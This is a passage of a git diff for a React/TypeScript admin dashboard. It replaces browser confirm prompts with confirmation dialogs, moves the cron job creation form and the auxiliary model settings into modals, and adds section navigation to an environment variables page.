     // "reset this tab", not "wipe my entire config.yaml".
     const scopedFields = isSearching ? searchMatchedFields : activeFields;
     if (scopedFields.length === 0) return;
+    setConfirmReset(true);
+  };
+
+  const executeReset = () => {
+    if (!defaults || !config) return;
+    setConfirmReset(false);
+    const scopedFields = isSearching ? searchMatchedFields : activeFields;
+    if (scopedFields.length === 0) return;
     const scopeLabel = isSearching
       ? t.config.searchResults
       : prettyCategoryName(activeCategory);
-    const message = t.config.confirmResetScope.replace("{scope}", scopeLabel);
-    if (!window.confirm(message)) return;
     let next: Record<string, unknown> = config;
     for (const [key] of scopedFields) {
       next = setNestedValue(next, key, getNestedValue(defaults, key));
@@ -627,6 +635,22 @@ export default function ConfigPage() {
         </div>
       )}
       <PluginSlot name="config:bottom" />
+      <ConfirmDialog
+        open={confirmReset}
+        onCancel={() => setConfirmReset(false)}
+        onConfirm={executeReset}
+        title={t.config.confirmResetScope.replace(
+          "{scope}",
+          isSearching
+            ? t.config.searchResults
+            : prettyCategoryName(activeCategory),
+        )}
+        description={`This will reset ${
+          (isSearching ? searchMatchedFields : activeFields).length
+        } field(s) to their default values.`}
+        destructive
+        confirmLabel={t.config.resetDefaults}
+      />
     </div>
   );
 }
diff --git a/web/src/pages/CronPage.tsx b/web/src/pages/CronPage.tsx
index e994c96f270..78880adf0bc 100644
--- a/web/src/pages/CronPage.tsx
+++ b/web/src/pages/CronPage.tsx
@@ -1,5 +1,5 @@
-import { useCallback, useEffect, useState } from "react";
-import { Clock, Pause, Play, Plus, Trash2, Zap } from "lucide-react";
+import { useCallback, useEffect, useLayoutEffect, useState } from "react";
+import { Clock, Pause, Play, Plus, Trash2, X, Zap } from "lucide-react";
 import { Badge } from "@nous-research/ui/ui/components/badge";
 import { Button } from "@nous-research/ui/ui/components/button";
 import { Select, SelectOption } from "@nous-research/ui/ui/components/select";
@@ -10,11 +10,13 @@ import type { CronJob } from "@/lib/api";
 import { DeleteConfirmDialog } from "@/components/DeleteConfirmDialog";
 import { useToast } from "@/hooks/useToast";
 import { useConfirmDelete } from "@/hooks/useConfirmDelete";
+import { useModalBehavior } from "@/hooks/useModalBehavior";
 import { Toast } from "@/components/Toast";
-import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
+import { Card, CardContent } from "@/components/ui/card";
 import { Input } from "@/components/ui/input";
 import { Label } from "@/components/ui/label";
 import { useI18n } from "@/i18n";
+import { usePageHeader } from "@/contexts/usePageHeader";
 import { PluginSlot } from "@/plugins";
 
 function formatTime(iso?: string | null): string {
@@ -80,11 +82,18 @@ export default function CronPage() {
   const [loading, setLoading] = useState(true);
   const { toast, showToast } = useToast();
   const { t } = useI18n();
+  const { setEnd } = usePageHeader();
 
-  // New job form state
+  // New job modal state
+  const [createModalOpen, setCreateModalOpen] = useState(false);
   const [prompt, setPrompt] = useState("");
   const [schedule, setSchedule] = useState("");
   const [name, setName] = useState("");
+  const closeCreateModal = useCallback(() => setCreateModalOpen(false), []);
+  const createModalRef = useModalBehavior({
+    open: createModalOpen,
+    onClose: closeCreateModal,
+  });
   const [deliver, setDeliver] = useState("local");
   const [creating, setCreating] = useState(false);
 
@@ -118,6 +127,7 @@ export default function CronPage() {
       setSchedule("");
       setName("");
       setDeliver("local");
+      setCreateModalOpen(false);
       loadJobs();
     } catch (e) {
       showToast(`${t.config.failedToSave}: ${e}`, "error");
@@ -181,6 +191,22 @@ export default function CronPage() {
     ),
   });
 
+  // Put "Create" button in page header
+  useLayoutEffect(() => {
+    setEnd(
+      <Button
+        size="sm"
+        onClick={() => setCreateModalOpen(true)}
+      >
+        <Plus className="h-3 w-3" />
+        {t.common.create}
+      </Button>,
+    );
+    return () => {
+      setEnd(null);
+    };
+  }, [setEnd, t.common.create, loading]);
+
   if (loading) {
     return (
       <div className="flex items-center justify-center py-24">
@@ -213,86 +239,110 @@ export default function CronPage() {
         loading={jobDelete.isDeleting}
       />
 
-      <Card>
-        <CardHeader>
-          <CardTitle className="flex items-center gap-2 text-base">
-            <Plus className="h-4 w-4" />
-            {t.cron.newJob}
-          </CardTitle>
-        </CardHeader>
-        <CardContent>
-          <div className="grid gap-4">
-            <div className="grid gap-2">
-              <Label htmlFor="cron-name">{t.cron.nameOptional}</Label>
-              <Input
-                id="cron-name"
-                placeholder={t.cron.namePlaceholder}
-                value={name}
-                onChange={(e) => setName(e.target.value)}
-              />
-            </div>
+      {/* Create job modal */}
+      {createModalOpen && (
+        <div
+          ref={createModalRef}
+          className="fixed inset-0 z-[100] flex items-center justify-center bg-background/85 backdrop-blur-sm p-4"
+          onClick={(e) => e.target === e.currentTarget && setCreateModalOpen(false)}
+          role="dialog"
+          aria-modal="true"
+          aria-labelledby="create-cron-title"
+        >
+          <div className="relative w-full max-w-lg border border-border bg-card shadow-2xl flex flex-col">
+            <Button
+              ghost
+              size="icon"
+              onClick={() => setCreateModalOpen(false)}
+              className="absolute right-2 top-2 text-muted-foreground hover:text-foreground"
+              aria-label="Close"
+            >
+              <X />
+            </Button>
 
-            <div className="grid gap-2">
-              <Label htmlFor="cron-prompt">{t.cron.prompt}</Label>
-              <textarea
-                id="cron-prompt"
-                className="flex min-h-[80px] w-full border border-input bg-transparent px-3 py-2 text-sm shadow-sm placeholder:text-muted-foreground focus-visible:outline-none focus-visible:ring-1 focus-visible:ring-ring"
-                placeholder={t.cron.promptPlaceholder}
-                value={prompt}
-                onChange={(e) => setPrompt(e.target.value)}
-              />
-            </div>
+            <header className="p-5 pb-3 border-b border-border">
+              <h2
+                id="create-cron-title"
+                className="font-display text-base tracking-wider uppercase"
+              >
+                {t.cron.newJob}
+              </h2>
+            </header>
 
-            <div className="grid grid-cols-1 sm:grid-cols-3 gap-4">
+            <div className="p-5 grid gap-4">
               <div className="grid gap-2">
-                <Label htmlFor="cron-schedule">{t.cron.schedule}</Label>
+                <Label htmlFor="cron-name">{t.cron.nameOptional}</Label>
                 <Input
-                  id="cron-schedule"
-                  placeholder={t.cron.schedulePlaceholder}
-                  value={schedule}
-                  onChange={(e) => setSchedule(e.target.value)}
+                  id="cron-name"
+                  autoFocus
+                  placeholder={t.cron.namePlaceholder}
+                  value={name}
+                  onChange={(e) => setName(e.target.value)}
                 />
               </div>
 
               <div className="grid gap-2">
-                <Label htmlFor="cron-deliver">{t.cron.deliverTo}</Label>
-                <Select
-                  id="cron-deliver"
-                  value={deliver}
-                  onValueChange={(v) => setDeliver(v)}
-                >
-                  <SelectOption value="local">
-                    {t.cron.delivery.local}
-                  </SelectOption>
-                  <SelectOption value="telegram">
-                    {t.cron.delivery.telegram}
-                  </SelectOption>
-                  <SelectOption value="discord">
-                    {t.cron.delivery.discord}
-                  </SelectOption>
-                  <SelectOption value="slack">
-                    {t.cron.delivery.slack}
-                  </SelectOption>
-                  <SelectOption value="email">
-                    {t.cron.delivery.email}
-                  </SelectOption>
-                </Select>
+                <Label htmlFor="cron-prompt">{t.cron.prompt}</Label>
+                <textarea
+                  id="cron-prompt"
+                  className="flex min-h-[80px] w-full border border-border bg-background/40 px-3 py-2 text-sm font-courier shadow-sm placeholder:text-muted-foreground focus-visible:outline-none focus-visible:ring-1 focus-visible:ring-foreground/30 focus-visible:border-foreground/25"
+                  placeholder={t.cron.promptPlaceholder}
+                  value={prompt}
+                  onChange={(e) => setPrompt(e.target.value)}
+                />
               </div>
 
-              <div className="flex items-end">
+              <div className="grid grid-cols-1 sm:grid-cols-2 gap-4">
+                <div className="grid gap-2">
+                  <Label htmlFor="cron-schedule">{t.cron.schedule}</Label>
+                  <Input
+                    id="cron-schedule"
+                    placeholder={t.cron.schedulePlaceholder}
+                    value={schedule}
+                    onChange={(e) => setSchedule(e.target.value)}
+                  />
+                </div>
+
+                <div className="grid gap-2">
+                  <Label htmlFor="cron-deliver">{t.cron.deliverTo}</Label>
+                  <Select
+                    id="cron-deliver"
+                    value={deliver}
+                    onValueChange={(v) => setDeliver(v)}
+                  >
+                    <SelectOption value="local">
+                      {t.cron.delivery.local}
+                    </SelectOption>
+                    <SelectOption value="telegram">
+                      {t.cron.delivery.telegram}
+                    </SelectOption>
+                    <SelectOption value="discord">
+                      {t.cron.delivery.discord}
+                    </SelectOption>
+                    <SelectOption value="slack">
+                      {t.cron.delivery.slack}
+                    </SelectOption>
+                    <SelectOption value="email">
+                      {t.cron.delivery.email}
+                    </SelectOption>
+                  </Select>
+                </div>
+              </div>
+
+              <div className="flex justify-end">
                 <Button
+                  size="sm"
                   onClick={handleCreate}
                   disabled={creating}
-                  prefix={<Plus />}
-                  className="w-full"
+                  prefix={creating ? <Spinner /> : <Plus />}
                 >
                   {creating ? t.common.creating : t.common.create}
                 </Button>
               </div>
             </div>
           </div>
-        </CardContent>
-      </Card>
+        </div>
+      )}
 
       <div className="flex flex-col gap-3">
         <H2
diff --git a/web/src/pages/EnvPage.tsx b/web/src/pages/EnvPage.tsx
index 9751ce37903..1c457da0583 100644
--- a/web/src/pages/EnvPage.tsx
+++ b/web/src/pages/EnvPage.tsx
@@ -1,4 +1,4 @@
-import { useCallback, useEffect, useMemo, useState } from "react";
+import { useCallback, useEffect, useLayoutEffect, useMemo, useState } from "react";
 import {
   Eye,
   EyeOff,
@@ -35,6 +35,7 @@ import { Badge } from "@nous-research/ui/ui/components/badge";
 import { Input } from "@/components/ui/input";
 import { Label } from "@/components/ui/label";
 import { useI18n } from "@/i18n";
+import { usePageHeader } from "@/contexts/usePageHeader";
 import { PluginSlot } from "@/plugins";
 
 /* ------------------------------------------------------------------ */
@@ -132,7 +133,7 @@ function EnvVarRow({
   // Compact inline row for unset, non-editing keys (used inside provider groups)
   if (compact && !info.is_set && !isEditing) {
     return (
-      <div className="flex items-center justify-between gap-3 py-1.5 opacity-50 hover:opacity-100 transition-opacity">
+      <div className="flex items-center justify-between gap-3 py-1.5 min-w-0 overflow-hidden opacity-50 hover:opacity-100 transition-opacity">
         <div className="flex items-center gap-2 min-w-0">
           <span className="font-mono-ui text-[0.7rem] text-muted-foreground">
             {varKey}
@@ -168,7 +169,7 @@ function EnvVarRow({
   // Non-compact unset row
   if (!info.is_set && !isEditing) {
     return (
-      <div className="flex items-center justify-between gap-3 border border-border/50 px-4 py-2.5 opacity-60 hover:opacity-100 transition-opacity">
+      <div className="flex items-center justify-between gap-3 border border-border/50 px-4 py-2.5 min-w-0 overflow-hidden opacity-60 hover:opacity-100 transition-opacity">
         <div className="flex items-center gap-3 min-w-0">
           <Label className="font-mono-ui text-[0.7rem] text-muted-foreground">
             {varKey}
@@ -203,7 +204,7 @@ function EnvVarRow({
 
   // Full expanded row for set keys or keys being edited
   return (
-    <div className="grid gap-2 border border-border p-4">
+    <div className="grid gap-2 border border-border p-4 min-w-0 overflow-hidden">
       <div className="flex items-center justify-between gap-2 flex-wrap">
         <div className="flex items-center gap-2">
           <Label className="font-mono-ui text-[0.7rem]">{varKey}</Label>
@@ -493,6 +494,7 @@ export default function EnvPage() {
   const [showAdvanced, setShowAdvanced] = useState(true); // Show all providers by default
   const { toast, showToast } = useToast();
   const { t } = useI18n();
+  const { setAfterTitle } = usePageHeader();
 
   useEffect(() => {
     api
@@ -501,6 +503,58 @@ export default function EnvPage() {
       .catch(() => {});
   }, []);
 
+  // Scroll-to sub-nav in the page header
+  const sections = useMemo(() => {
+    const items: { id: string; label: string }[] = [
+      { id: "section-oauth", label: "OAuth" },
+      { id: "section-providers", label: "Providers" },
+    ];
+    if (vars) {
+      const categories = ["tool", "messaging", "setting"];
+      const CATEGORY_LABELS: Record<string, string> = {
+        tool: "Tools",
+        messaging: "Messaging",
+        setting: "Settings",
+      };
+      for (const cat of categories) {
+        const hasEntries = Object.values(vars).some(
+          (info) => info.category === cat,
+        );
+        if (hasEntries) {
+          items.push({ id: `section-${cat}`, label: CATEGORY_LABELS[cat] ?? cat });
+        }
+      }
+    }
+    return items;
+  }, [vars]);
+
+  useLayoutEffect(() => {
+    if (!vars) {
+      setAfterTitle(null);
+      return;
+    }
+    const scrollTo = (id: string) => {
+      document.getElementById(id)?.scrollIntoView({ behavior: "smooth", block: "start" });
+    };
+    setAfterTitle(
+      <nav className="flex items-center gap-1" aria-label="Jump to section">
+        {sections.map((s) => (
+          <button
+            key={s.id}
+            type="button"
+            onClick={() => scrollTo(s.id)}
+            className="cursor-pointer px-2 py-0.5 text-[10px] uppercase tracking-wider text-muted-foreground hover:text-foreground border border-border/50 hover:border-foreground/30 transition-colors"
+          >
+            {s.label}
+          </button>
+        ))}
+      </nav>,
+    );
+    return () => {
+      setAfterTitle(null);
+    };
+  }, [vars, sections, setAfterTitle]);
+
   const handleSave = async (key: string) => {
     const value = edits[key];
     if (!value) return;
@@ -701,12 +755,14 @@ export default function EnvPage() {
         </Button>
       </div>
 
-      <OAuthProvidersCard
-        onError={(msg) => showToast(msg, "error")}
-        onSuccess={(msg) => showToast(msg, "success")}
-      />
+      <div id="section-oauth">
+        <OAuthProvidersCard
+          onError={(msg) => showToast(msg, "error")}
+          onSuccess={(msg) => showToast(msg, "success")}
+        />
+      </div>
 
-      <Card>
+      <Card id="section-providers">
         <CardHeader className="border-b border-border bg-card">
           <div className="flex items-center gap-2">
             <Zap className="h-5 w-5 text-muted-foreground" />
@@ -750,7 +806,7 @@ export default function EnvPage() {
           if (totalEntries === 0) return null;
 
           return (
-            <Card key={category}>
+            <Card key={category} id={`section-${category}`}>
               <CardHeader className="border-b border-border bg-card">
                 <div className="flex items-center gap-2">
                   <Icon className="h-5 w-5 text-muted-foreground" />
@@ -762,7 +818,7 @@ export default function EnvPage() {
                 </CardDescription>
               </CardHeader>
 
-              <CardContent className="grid gap-3 pt-4">
+              <CardContent className="grid gap-3 pt-4 overflow-hidden">
                 {setEntries.map(([key, info]) => (
                   <EnvVarRow
                     key={key}
diff --git a/web/src/pages/ModelsPage.tsx b/web/src/pages/ModelsPage.tsx
index 72b082f6299..01c239d7034 100644
--- a/web/src/pages/ModelsPage.tsx
+++ b/web/src/pages/ModelsPage.tsx
@@ -9,6 +9,7 @@ import {
   Settings2,
   Star,
   Wrench,
+  X,
   Zap,
 } from "lucide-react";
 import { api } from "@/lib/api";
@@ -25,6 +26,8 @@ import { Spinner } from "@nous-research/ui/ui/components/spinner";
 import { Stats } from "@nous-research/ui/ui/components/stats";
 import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
 import { Badge } from "@nous-research/ui/ui/components/badge";
+import { ConfirmDialog } from "@/components/ui/confirm-dialog";
+import { useModalBehavior } from "@/hooks/useModalBehavior";
 import { usePageHeader } from "@/contexts/usePageHeader";
 import { useI18n } from "@/i18n";
 import { PluginSlot } from "@/plugins";
@@ -91,27 +94,39 @@ function TokenBar({
   if (total === 0) return null;
 
   const segments = [
-    { value: cacheRead, color: "bg-blue-400/60", label: "Cache Read" },
-    { value: reasoning, color: "bg-purple-400/60", label: "Reasoning" },
-    { value: input, color: "bg-[#ffe6cb]/70", label: "Input" },
-    { value: output, color: "bg-emerald-500/70", label: "Output" },
+    { value: cacheRead, color: "bg-blue-400/60", dotColor: "bg-blue-400", label: "Cache Read" },
+    { value: reasoning, color: "bg-purple-400/60", dotColor: "bg-purple-400", label: "Reasoning" },
+    { value: input, color: "bg-[#ffe6cb]/70", dotColor: "bg-[#ffe6cb]", label: "Input" },
+    { value: output, color: "bg-emerald-500/70", dotColor: "bg-emerald-500", label: "Output" },
   ].filter((s) => s.value > 0);
 
   return (
-    <div className="space-y-1">
-      <div className="flex h-2 w-full overflow-hidden rounded-sm bg-muted/30">
+    <div className="space-y-1.5">
+      {/* Stacked bar — segments fill proportionally to their share of total */}
+      <div className="relative flex min-h-[1.5rem] w-full items-stretch overflow-hidden">
         {segments.map((s, i) => (
           <div
             key={i}
-            className={`${s.color} transition-all duration-300`}
+            className={`${s.color} relative flex items-center transition-all duration-300`}
             style={{ width: `${(s.value / total) * 100}%` }}
-          />
+          >
+            {/* Stepped fill pattern overlay */}
+            <div
+              className="absolute inset-0 opacity-30"
+              style={{
+                backgroundImage:
+                  "repeating-linear-gradient(to right, transparent 0 0.4rem, currentColor 0.4rem calc(0.4rem + 1px))",
+              }}
+            />
+          </div>
         ))}
       </div>
+
+      {/* Legend */}
       <div className="flex flex-wrap gap-x-3 gap-y-0.5 text-[10px] text-muted-foreground">
         {segments.map((s, i) => (
           <span key={i} className="flex items-center gap-1">
-            <span className={`inline-block h-1.5 w-1.5 rounded-full ${s.color}`} />
+            <span className={`inline-block h-1.5 w-1.5 rounded-full ${s.dotColor}`} />
             {s.label} {formatTokens(s.value)}
           </span>
         ))}
@@ -378,7 +393,7 @@ function ModelCard({
           </div>
         </div>
       </CardHeader>
-      <CardContent className="space-y-3 pt-0">
+      <CardContent className="space-y-3 pt-3">
         <TokenBar
           input={entry.input_tokens}
           output={entry.output_tokens}
@@ -445,6 +460,157 @@ type PickerTarget =
   | { kind: "main" }
   | { kind: "aux"; task: string };
 
+function AuxiliaryTasksModal({
+  aux,
+  refreshKey,
+  onSaved,
+  onClose,
+}: {
+  aux: AuxiliaryModelsResponse | null;
+  refreshKey: number;
+  onSaved(): void;
+  onClose(): void;
+}) {
+  const [picker, setPicker] = useState<PickerTarget | null>(null);
+  const [resetBusy, setResetBusy] = useState(false);
+  const [confirmReset, setConfirmReset] = useState(false);
+  const modalRef = useModalBehavior({ open: true, onClose });
+
+  const resetAllAux = async () => {
+    setConfirmReset(false);
+    setResetBusy(true);
+    try {
+      await api.setModelAssignment({
+        scope: "auxiliary",
+        task: "__reset__",
+        provider: "",
+        model: "",
+      });
+      onSaved();
+    } finally {
+      setResetBusy(false);
+    }
+  };
+
+  return (
+    <div
+      ref={modalRef}
+      className="fixed inset-0 z-[100] flex items-center justify-center bg-background/85 backdrop-blur-sm p-4"
+      onClick={(e) => e.target === e.currentTarget && onClose()}
+      role="dialog"
+      aria-modal="true"
+      aria-labelledby="aux-modal-title"
+    >
+      <div className="relative w-full max-w-2xl max-h-[80vh] border border-border bg-card shadow-2xl flex flex-col">
+        <Button
+          ghost
+          size="icon"
+          onClick={onClose}
+          className="absolute right-2 top-2 text-muted-foreground hover:text-foreground"
+          aria-label="Close"
+        >
+          <X />
+        </Button>
+
+        <header className="p-5 pb-3 border-b border-border">
+          <div className="flex items-center justify-between gap-3 pr-8">
+            <h2
+              id="aux-modal-title"
+              className="font-display text-base tracking-wider uppercase"
+            >
+              Auxiliary Tasks
+            </h2>
+            <Button
+              size="sm"
+              outlined
+              onClick={() => setConfirmReset(true)}
+              disabled={resetBusy}
+              className="text-[10px] h-6"
+              prefix={resetBusy ? <Spinner /> : null}
+            >
+              Reset all to auto
+            </Button>
+          </div>
+          <p className="text-[10px] text-muted-foreground/80 mt-2">
+            Auxiliary tasks handle side-jobs like vision, session search, and
+            compression. <span className="font-mono">auto</span> means
+            &quot;use the main model&quot;. Override per-task when you want a
+            cheap/fast model for a specific job.
+          </p>
+        </header>
+
+        <div className="flex-1 overflow-y-auto p-5 space-y-1">
+          {AUX_TASKS.map((t) => {
+            const cur = aux?.tasks.find((a) => a.task === t.key);
+            const isAuto =
+              !cur || cur.provider === "auto" || !cur.provider;
+            return (
+              <div
+                key={t.key}
+                className="flex items-center justify-between gap-3 px-3 py-2 border border-border/30 bg-card/50 hover:bg-muted/20 transition-colors"
+              >
+                <div className="min-w-0 flex-1">
+                  <div className="flex items-baseline gap-2">
+                    <span className="text-xs font-medium">{t.label}</span>
+                    <span className="text-[10px] text-muted-foreground/60">
+                      {t.hint}
+                    </span>
+                  </div>
+                  <div className="text-[10px] font-mono text-muted-foreground truncate">
+                    {isAuto
+                      ? "auto (use main model)"
+                      : `${cur?.provider} · ${cur?.model || "(provider default)"}`}
+                  </div>
+                </div>
+                <Button
+                  size="sm"
+                  outlined
+                  onClick={() => setPicker({ kind: "aux", task: t.key })}
+                  className="text-[10px] h-6"
+                >
+                  Change
+                </Button>
+              </div>
+            );
+          })}
+        </div>
+
+        {picker && picker.kind === "aux" && (
+          <ModelPickerDialog
+            key={`picker-${refreshKey}`}
+            loader={api.getModelOptions}
+            alwaysGlobal
+            title={`Set Auxiliary: ${
+              AUX_TASKS.find((t) => t.key === picker.task)?.label ??
+              picker.task
+            }`}
+            onApply={async ({ provider, model }) => {
+              await api.setModelAssignment({
+                scope: "auxiliary",
+                task: picker.task,
+                provider,
+                model,
+              });
+              onSaved();
+            }}
+            onClose={() => setPicker(null)}
+          />
+        )}
+        <ConfirmDialog
+          open={confirmReset}
+          onCancel={() => setConfirmReset(false)}
+          onConfirm={() => void resetAllAux()}
+          title="Reset auxiliary models"
+          description="Reset every auxiliary task to 'auto'? This overrides any per-task overrides you've set."
+          destructive
+          confirmLabel="Reset all"
+          loading={resetBusy}
+        />
+      </div>
+    </div>
+  );
+}
+
 function ModelSettingsPanel({
   aux,
   refreshKey,
@@ -454,9 +620,8 @@ function ModelSettingsPanel({
   refreshKey: number;
   onSaved(): void;
 }) {
-  const [expanded, setExpanded] = useState(false);
+  const [auxModalOpen, setAuxModalOpen] = useState(false);
   const [picker, setPicker] = useState<PickerTarget | null>(null);
-  const [resetBusy, setResetBusy] = useState(false);
 
   const mainProv = aux?.main.provider ?? "";
   const mainModel = aux?.main.model ?? "";
@@ -476,23 +641,10 @@ function ModelSettingsPanel({
     onSaved();
   };
 
-  const resetAllAux = async () => {
-    if (!window.confirm("Reset every auxiliary task to 'auto'? This overrides any per-task overrides you've set.")) {
-      return;
-    }
-    setResetBusy(true);
-    try {
-      await api.setModelAssignment({
-        scope: "auxiliary",
-        task: "__reset__",
-        provider: "",
-        model: "",
-      });
-      onSaved();
-    } finally {
-      setResetBusy(false);
-    }
-  };
+  // Count how many aux tasks have overrides
+  const auxOverrideCount = aux?.tasks.filter(
+    (a) => a.provider && a.provider !== "auto",
+  ).length ?? 0;
 
   return (
     <Card>
@@ -505,21 +657,10 @@ function ModelSettingsPanel({
               applies to new sessions
             </span>
           </div>
-          <Button
-            size="sm"
-            outlined
-            onClick={() => setExpanded((v) => !v)}
-            className="text-xs"
-          >
-            {expanded ? "Hide auxiliary" : "Show auxiliary"}
-            <ChevronDown
-              className={`h-3 w-3 transition-transform ${expanded ? "rotate-180" : ""}`}
-            />
-          </Button>
         </div>
       </CardHeader>
 
-      <CardContent className="space-y-3 pt-0">
+      <CardContent className="space-y-3 pt-3">
         {/* Main row */}
         <div className="flex items-center justify-between gap-3 bg-muted/20 border border-border/50 px-3 py-2">
           <div className="min-w-0 flex-1">
@@ -544,85 +685,41 @@ function ModelSettingsPanel({
           </Button>
         </div>
 
-        {/* Auxiliary rows */}
-        {expanded && (
-          <div className="space-y-1 border-t border-border/50 pt-3">
-            <div className="flex items-center justify-between pb-1">
-              <div className="text-[10px] uppercase tracking-wider text-muted-foreground">
+        {/* Auxiliary tasks summary + open modal */}
+        <div className="flex items-center justify-between gap-3 bg-muted/20 border border-border/50 px-3 py-2">
+          <div className="min-w-0 flex-1">
+            <div className="flex items-center gap-2 mb-0.5">
+              <Cpu className="h-3 w-3 text-muted-foreground" />
+              <span className="text-xs font-medium uppercase tracking-wider">
                 Auxiliary tasks
-              </div>
-              <Button
-                size="sm"
-                outlined
-                onClick={resetAllAux}
-                disabled={resetBusy}
-                className="text-[10px] h-6"
-                prefix={resetBusy ? <Spinner /> : null}
-              >
-                Reset all to auto
-              </Button>
+              </span>
+            </div>
+            <div className="text-xs font-mono text-muted-foreground truncate">
+              {auxOverrideCount > 0
+                ? `${auxOverrideCount} override${auxOverrideCount > 1 ? "s" : ""} · ${AUX_TASKS.length - auxOverrideCount} auto`
+                : `${AUX_TASKS.length} tasks · all auto`}
             </div>
-
-            <p className="text-[10px] text-muted-foreground/80 pb-2">
-              Auxiliary tasks handle side-jobs like vision, session search, and
-              compression. <span className="font-mono">auto</span> means
-              &quot;use the main model&quot;. Override per-task when you want a
-              cheap/fast model for a specific job.
-            </p>
-
-            {AUX_TASKS.map((t) => {
-              const cur = aux?.tasks.find((a) => a.task === t.key);
-              const isAuto =
-                !cur || cur.provider === "auto" || !cur.provider;
-              return (
-                <div
-                  key={t.key}
-                  className="flex items-center justify-between gap-3 px-3 py-1.5 border border-border/30 bg-card/50 hover:bg-muted/20 transition-colors"
-                >
-                  <div className="min-w-0 flex-1">
-                    <div className="flex items-baseline gap-2">
-                      <span className="text-xs font-medium">{t.label}</span>
-                      <span className="text-[10px] text-muted-foreground/60">
-                        {t.hint}
-                      </span>
-                    </div>
-                    <div className="text-[10px] font-mono text-muted-foreground truncate">
-                      {isAuto
-                        ? "auto (use main model)"
-                        : `${cur?.provider} · ${cur?.model || "(provider default)"}`}
-                    </div>
-                  </div>
-                  <Button
-                    size="sm"
-                    outlined
-                    onClick={() => setPicker({ kind: "aux", task: t.key })}
-                    className="text-[10px] h-6"
-                  >
-                    Change
-                  </Button>
-                </div>
-              );
-            })}
           </div>
-        )}
+          <Button
+            size="sm"
+            outlined
+            onClick={() => setAuxModalOpen(true)}
+            className="text-xs"
+          >
+            Configure
+          </Button>
+        </div>
 
         {picker && (
           <ModelPickerDialog
             key={`picker-${refreshKey}`}
             loader={api.getModelOptions}
             alwaysGlobal
-            title={
-              picker.kind === "main"
-                ? "Set Main Model"
-                : `Set Auxiliary: ${
-                    AUX_TASKS.find((t) => t.key === picker.task)?.label ??
-                    picker.task
-                  }`
-            }
+            title="Set Main Model"
             onApply={async ({ provider, model }) => {
               await applyAssignment({
-                scope: picker.kind === "main" ? "main" : "auxiliary",
-                task: picker.kind === "main" ? "" : picker.task,
+                scope: "main",
+                task: "",
                 provider,
                 model,
               });
@@ -630,6 +727,15 @@ function ModelSettingsPanel({
             onClose={() => setPicker(null)}
           />
         )}
+
+        {auxModalOpen && (
+          <AuxiliaryTasksModal
+            aux={aux}
+            refreshKey={refreshKey}
+            onSaved={onSaved}
+            onClose={() => setAuxModalOpen(false)}
+          />
+        )}
       </CardContent>
     </Card>
   );
@@ -725,28 +831,14 @@ export default function ModelsPage() {
     <div className="flex flex-col gap-6">
       <PluginSlot name="models:top" />
 
-      <ModelSettingsPanel
-        aux={aux}
-        refreshKey={saveKey}
-        onSaved={onAssigned}
-      />
+      <div className="grid gap-6 lg:grid-cols-2">
+        <ModelSettingsPanel
+          aux={aux}
+          refreshKey={saveKey}
+          onSaved={onAssigned}
+        />
 
-      {loading && !data && (
-        <div className="flex items-center justify-center py-24">
-          <Spinner className="text-2xl text-primary" />
-        </div>
-      )}
-
-      {error && (
-        <Card>
-          <CardContent className="py-6">
-            <p className="text-sm text-destructive text-center">{error}</p>
-          </CardContent>
-        </Card>
-      )}
-
-      {data && (
-        <>
+        {data && (
           <Card>
             <CardContent className="py-6">
               <Stats
@@ -781,7 +873,25 @@ export default function ModelsPage() {
               />
             </CardContent>
           </Card>
+        )}
+      </div>
 
+      {loading && !data && (
+        <div className="flex items-center justify-center py-24">
+          <Spinner className="text-2xl text-primary" />
+        </div>
+      )}
+
+      {error && (
+        <Card>
+          <CardContent className="py-6">
+            <p className="text-sm text-destructive text-center">{error}</p>
+          </CardContent>
+        </Card>
+      )}
+
+      {data && (
+        <>
           {data.models.length > 0 ? (
             <div className="grid gap-4 md:grid-cols-2 xl:grid-cols-3">
               {data.models.map((m, i) => (
diff --git a/web/src/pages/PluginsPage.tsx b/web/src/pages/PluginsPage.tsx
index 17123cd9e39..290e5e04f0f 100644
--- a/web/src/pages/PluginsPage.tsx
+++ b/web/src/pages/PluginsPage.tsx
@@ -11,6 +11,7 @@ import { Switch } from "@nous-research/ui/ui/components/switch";
 import { Spinner } from "@nous-research/ui/ui/components/spinner";
 import { CommandBlock } from "@nous-research/ui/ui/components/command-block";
 import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
+import { ConfirmDialog } from "@/components/ui/confirm-dialog";
 import { Input } from "@/components/ui/input";
 import { Label } from "@/components/ui/label";
 import { useToast } from "@/hooks/useToast";
@@ -393,6 +394,7 @@ function PluginRowCard(props: PluginRowCardProps) {
   const tabPath = dm?.tab && !dm.tab.hidden ? dm.tab.override ?? dm.tab.path : null;
 
   const busy = rowBusy === row.name;
+  const [confirmRemove, setConfirmRemove] = useState(false);
 
   const badgeTone =
     row.runtime_status === "enabled"
@@ -533,18 +535,7 @@ function PluginRowCard(props: PluginRowCardProps) {
                 disabled={busy}
                 ghost
                 size="sm"
-                onClick={() => {
-                  const ok =
-                    typeof window !== "undefined"
-                      ? window.confirm(t.pluginsPage.removeConfirm)
-                      : false;
-                  if (!ok) return;
-
-                  void setRuntimeLoading(row.name, async () => {
-                    await api.removeAgentPlugin(row.name);
-                    showToast(`${row.name} removed`, "success");
-                  });
-                }}
+                onClick={() => setConfirmRemove(true)}
               >
 
                 {busy ? <Spinner /> : <Trash2 className="h-3.5 w-3.5" />}
@@ -576,6 +567,21 @@ function PluginRowCard(props: PluginRowCardProps) {
         ) : null}
       </CardContent>
 
+      <ConfirmDialog
+        open={confirmRemove}
+        onCancel={() => setConfirmRemove(false)}
+        onConfirm={() => {
+          setConfirmRemove(false);
+          void setRuntimeLoading(row.name, async () => {
+            await api.removeAgentPlugin(row.name);
+            showToast(`${row.name} removed`, "success");
+          });
+        }}
+        title={t.pluginsPage.removeConfirm}
+        description={`This will remove the "${row.name}" plugin from your agent.`}
+        destructive
+        confirmLabel={t.common.delete}
+      />
     </Card>
   );
 }
diff --git a/web/src/pages/ProfilesPage.tsx b/web/src/pages/ProfilesPage.tsx
index e8dbfe07374..933f3f3e1d3 100644
--- a/web/src/pages/ProfilesPage.tsx
+++ b/web/src/pages/ProfilesPage.tsx
@@ -1,18 +1,21 @@
-import { useCallback, useEffect, useRef, useState } from "react";
-import { ChevronDown, Pencil, Plus, Terminal, Trash2, Users } from "lucide-react";
+import { useCallback, useEffect, useLayoutEffect, useRef, useState } from "react";
